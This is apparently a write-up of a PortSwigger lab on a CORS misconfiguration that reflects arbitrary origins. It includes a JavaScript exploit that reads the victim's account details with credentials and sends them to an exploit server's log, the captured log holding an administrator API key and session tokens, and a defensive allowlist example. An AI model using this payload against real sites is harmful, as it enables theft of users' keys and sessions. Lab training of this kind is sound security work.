Cross-origin resource sharing (CORS) vulnerabilities

What is Cross-origin resource sharing (CORS)

Cross-Origin Resource Sharing (CORS) is a security mechanism implemented in web browsers. It controls access to a web application's resources (such as fonts, scripts, images, etc.) by requests from different origins.

CORS vulnerabilities refer to situations where an attacker can exploit cross-origin resource sharing to compromise security.

Through CORS vulnerabilities, attackers can exploit issues such as CORS misconfiguration, cross-origin data leakage, cross-site request forgery (CSRF), etc.

Cross-origin resource sharing (CORS) Practical Labs

CORS vulnerability with basic origin reflection
CORS vulnerability with trusted null origin
CORS vulnerability with trusted insecure protocols

CORS vulnerability with basic origin reflection

Lab Description Of Cross-origin resource sharing (CORS)

This lab contains an insecure CORS configuration that trusts all origins. To solve the lab, you need to write JavaScript that uses CORS to retrieve the administrator’s API key and upload the code to the exploit server. The lab is solved when you submit the administrator’s API key.

You can use the username and password “wiener:peter” to log in to the lab.

Lab Solution Of Cross-origin resource sharing (CORS)

First, access the lab. After accessing it, open Burp Suite and enable the proxy in your browser.

Once you’ve done that, click on “my account” and log in using the provided credentials.

After logging in with Wiener’s account, you will see some details displayed.

In the proxy history you will see a GET /accountDetails request whose response is in JSON format.

Send this request to the repeater tab for testing purposes.

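Add an extra header to the request to see if the server allows it:

Origin: https://example.com

If the response echoes this value in Access-Control-Allow-Origin and also sends Access-Control-Allow-Credentials: true, the server is reflecting arbitrary origins.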

<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
  location='/log?key='+this.responseText;
};
</script>

Replace “YOUR-LAB-ID” in the script with your lab ID (lab URL) and store it on the exploit server.

In my case, this is the lab ID: https://0aaa00b204a4d58580de498d00db003d.web-security-academy.net

Updated script version:

<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://0aaa00b204a4d58580de498d00db003d.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
  location='/log?key='+this.responseText;
};
</script>

Copy this script and store it on the exploit server. Once stored, deliver the exploit to the victim.

After performing the above steps, click on “access log.”

"GET /log?key={%20%20%22username%22:%20%22administrator%22,%20%20%22email%22:%20%22%22,%20%20%22apikey%22:%20%22nsLocr7bLZH3jTHwol2DylLNqOgpgQBQ%22,%20%20%22sessions%22:%20[%20%20%20%20%22qo3kg91owDRqGJdpWGtMB3ZIkUzhpLQl%22,%20%20%20%20%22pF6dqwK6kCxLsp2NoRms54HG76NiPHwP%22%20%20]} HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"

You can see that a GET request has provided me with the administrator’s API key.

nsLocr7bLZH3jTHwol2DylLNqOgpgQBQ

Now, I will submit this key in the lab.

By submitting the key in PortSwigger Web Security Lab, I have successfully solved the “CORS vulnerability with basic origin reflection” lab.
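
The server-side fix for the misconfiguration this lab demonstrates, as an added example that is not part of the original walkthrough or of the lab's own code: the reflecting policy beside an exact-match allowlist, run over constructed Origin values. The allowlist entries and all function names are hypothetical.

```javascript
// Added example; ALLOWED_ORIGINS and the function names are hypothetical.
const ALLOWED_ORIGINS = new Set([
  "https://app.example.com",
  "https://admin.example.com",
]);

// Vulnerable pattern: echo whatever Origin arrives and allow credentials.
function reflectingCorsHeaders(origin) {
  if (!origin) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened pattern: exact string match against a fixed allowlist.
// No prefix, suffix or regex matching, so lookalike hosts, "null" and
// http:// variants of a trusted host all fall through.
function allowlistCorsHeaders(origin) {
  // Vary: Origin stops a shared cache reusing one origin's response for another.
  const headers = { Vary: "Origin" };
  if (typeof origin !== "string" || !ALLOWED_ORIGINS.has(origin)) {
    return headers; // no Access-Control-Allow-Origin: browser blocks the read
  }
  headers["Access-Control-Allow-Origin"] = origin;
  headers["Access-Control-Allow-Credentials"] = "true";
  return headers;
}

// Run both policies over a list of Origin values and report which are granted.
function compareCorsPolicies(origins) {
  return origins.map((origin) => ({
    origin,
    reflecting: "Access-Control-Allow-Origin" in reflectingCorsHeaders(origin),
    allowlist: "Access-Control-Allow-Origin" in allowlistCorsHeaders(origin),
  }));
}

// Constructed sample Origin header values.
const SAMPLE_ORIGINS = [
  "https://app.example.com",               // listed origin
  "https://example.com",                   // the probe value used in the walkthrough
  "null",                                  // the "trusted null origin" case
  "http://app.example.com",                // the "trusted insecure protocols" case
  "https://app.example.com.attacker.test", // lookalike host
];

console.table(compareCorsPolicies(SAMPLE_ORIGINS));
```

Only the first sample is granted by the allowlist policy, while the reflecting policy grants all five.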

FAQs

What is web security?

Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.

What is web application security?

Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.

Which of the following is a good security practice for web browsing?

It is always a good practice to use an up-to-date browser with timely updates. Keep your browser plugins up-to-date, avoid malicious websites and links, and always enable 2-factor authentication while avoiding clickjacking.

How to find someone’s social security number on the dark web

Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.
